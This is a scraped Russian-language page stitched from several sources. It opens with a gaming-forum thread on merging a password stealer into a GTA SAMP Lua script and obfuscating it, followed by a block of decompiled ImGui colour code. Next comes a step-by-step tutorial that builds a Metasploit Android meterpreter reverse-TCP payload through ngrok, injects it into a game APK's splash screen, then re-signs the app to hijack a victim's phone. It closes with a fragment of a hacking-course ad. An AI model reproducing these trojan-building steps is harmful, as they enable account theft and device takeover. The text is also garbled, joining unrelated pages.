KingBrawlStars
Участник
Автор темы
Как склеить стиллер и скрипт рабочий?
FogRider
Активный
Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?
KingBrawlStars
Участник
Автор темы
Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?
что значит «Обфусцируешь»? Кстати вставил и всё равно не робит (
FogRider
Активный
что значит «Обфусцируешь»? Кстати вставил и всё равно не робит (
Обфуска́ция или запутывание кода — приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции.
Конечно, нужно не втупую копировать и вставлять, а более грамотно «вплетать» код в код. Например, у тебя не может быть две функции main или проверки на загрузку сампа.
СОЗДАЛ СВОЙ СТИЛЛЕР И РАСПИАРИЛ ЕГО! СКОЛЬКО АККАУНТОВ ПОПАЛОСЬ? — GTA SAMP
chapo
В армии с 03.07.2023, в лс не отвечаю
Друг
Вставляешь код стиллера в код рабочего скрипта, обфусцируешь и компилируешь это дело. В чем суть вопроса?
Был вроде сайт который склеивает, не?
FogRider
Активный
Был вроде сайт который склеивает, не?
Нашел на просторах интернета https://luajit.ru/joiner, но сам никогда не пользовался, думаю, ручками будет надежнее.
KingBrawlStars
Участник
Автор темы
Был вроде сайт который склеивает, не?
ошибку даёт
Был вроде сайт который склеивает, не?
пж можешь склеить их и объяснить как это, что бы потом я уже сам это делал P.S 6560 это стил teleport это рил телепорт (кордмастер)
Вложения
teleport-decompiled.lua
41.4 KB · Просмотры: 2
6560 (1).luac
30.3 KB · Просмотры: 2
Последнее редактирование: 29 Июл 2021
FogRider
Активный
пж можешь склеить их и объяснить как это, что бы потом я уже сам это делал P.S 6560 это стил teleport это рил телепорт (кордмастер)
Ты пытаешься склеить скомпилированный и декомпилированный (и, в данном случае, нерабочий) скрипт, из-за этого и появляется ошибка.
Попробуй загрузить на указанный сайт обе .luac версии или прикрепи сюда два опенсурсных .lua файла.
KingBrawlStars
Участник
Автор темы
Ты пытаешься склеить скомпилированный и декомпилированный (и, в данном случае, нерабочий) скрипт, из-за этого и появляется ошибка.
Попробуй загрузить на указанный сайт обе .luac версии или прикрепи сюда два опенсурсных .lua файла.
та я проверял и так и так все равно ничего не работает scum
в игре я кстати запускал стилер и тп деккомп всё робит.
chapo
В армии с 03.07.2023, в лс не отвечаю
Друг
в игре я кстати запускал стилер и тп деккомп всё робит.
как это может работать?
var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.77 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SliderGrabActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Button] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.82 —var_13_7 NUMBER-NUMBER var_13_8 = 0.39 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ButtonHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.87 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ButtonActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Header] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.76 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 0.57 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.HeaderHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.88 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 0.89 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.HeaderActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.4 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.Separator] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.6 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SeparatorHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 1 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 1 —var_13_8 NUMBER-NUMBER var_13_9 = 0.8 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.SeparatorActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGrip] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.76 —var_13_7 NUMBER-NUMBER var_13_8 = 0.37 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGripHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.86 —var_13_7 NUMBER-NUMBER var_13_8 = 0.41 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ResizeGripActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.82 —var_13_7 NUMBER-NUMBER var_13_8 = 0.39 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButton] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.88 —var_13_7 NUMBER-NUMBER var_13_8 = 0.42 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButtonHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 1 —var_13_7 NUMBER-NUMBER var_13_8 = 0.48 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.CloseButtonActive] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotLines] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.74 —var_13_7 NUMBER-NUMBER var_13_8 = 0.36 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotLinesHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotHistogram] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.8 —var_13_7 NUMBER-NUMBER var_13_8 = 0.38 —var_13_8 NUMBER-NUMBER var_13_9 = 1 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.PlotHistogramHovered] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0 —var_13_6 NUMBER-NUMBER var_13_7 = 0.69 —var_13_7 NUMBER-NUMBER var_13_8 = 0.33 —var_13_8 NUMBER-NUMBER var_13_9 = 0.72 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.TextSelectedBg] = var_13_5 var_13_5 = uget_13_0.ImVec4 var_13_6 = 0.17 —var_13_6 NUMBER-NUMBER var_13_7 = 0.17 —var_13_7 NUMBER-NUMBER var_13_8 = 0.17 —var_13_8 NUMBER-NUMBER var_13_9 = 0.48 —var_13_9 NUMBER-NUMBER var_13_5 = var_13_5(var_13_6, var_13_7, var_13_8, var_13_9) var_13_0.Colors[uget_13_0.Col.ModalWindowDarkening] = var_13_5
Источник: www.blast.hk
КАК СДЕЛАТЬ СОБСТВЕННЫЙ СТИЛЛЕР? | СТИЛЛЕР СВОИМИ РУКАМИ
Создаём стиллер на Android
Всем хай , сегодня будем вшивать Стиллер в игру , в обычный файл типа Apk , который после открытия на атакуемом смартфоне предоставит нам его сессию.
-Стиллер — определенный класс троянов (малвари, вирусов — как хотите), функционал которых полностью состоит из кражи сохраненных в системе паролей и отправка их «автору».
Установка необходимых компонентов
Устанавливаем Kali Linux (https://www.kali.org/downloads/).
Далее установим Zipalign
apt-get install -y zipalign
Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл (https://gist.github.com/bmaupin/48140926ce11fbeddec2). Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST= LPORT=M> /home/kali/payload.apk
На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью команд:
apktool d payload.apk
Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку «virtual methods» и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись командой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000
Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered
Выравниваем подписанное приложение командой
-v 4 game.apk game_good.apk
Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Спасибо за внимание, дорогие участники Akatsuki , увидимся в следующей статье)!
Источник: telegra.ph
Как засунуть стиллер в программу
Вы используете устаревший браузер. Этот и другие сайты могут отображаться в нем неправильно.
Необходимо обновить браузер или попробовать использовать другой.
B правой части каждого сообщения есть стрелки ⇧ и ⇩ . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок ✔ в правой части сообщения.
☀️ Специальное летнее предложение «Основы Python» + «Python Ethical Hacking» всего за 44.990р Не упусти возможность получить двойную выгоду: приобрети пакет курсов «Основы Python» + «Python для пентестера» со скидкой 20% только до 13 июля. Обучающая программа гарантирует комфортную нагрузку и получение необходимого объёма знаний. Ты пройдёшь путь от новичка до специалиста всего за 5 месяцев! Запишись со скидкой у менеджера
Источник: codeby.net